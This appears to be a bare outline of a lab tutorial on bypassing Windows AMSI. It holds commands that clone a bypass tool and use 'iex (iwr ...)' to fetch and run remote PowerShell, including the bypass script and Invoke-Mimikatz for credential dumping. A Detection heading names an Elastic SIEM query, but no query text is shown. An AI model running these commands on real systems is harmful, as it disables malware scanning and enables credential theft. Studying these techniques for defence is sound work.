AMSI Bypass
Introduction
Features
Practical
Downloading the Script
git clone https://github.com/anonymous300502/Nuke-AMSI.gitExecuting the Script on Windows Host
iex (iwr "http://192.168.56.2:8090/NukeAMSI.ps1")Executing Mimikatz
iex (iwr "https://raw.githubusercontent.com/PowershellMafia/Powersploit/refs/heads/master/Exfiltration/Invoke-Mimikatz.ps1")Detection
Elastic SIEM Query
REFERENCES
Last updated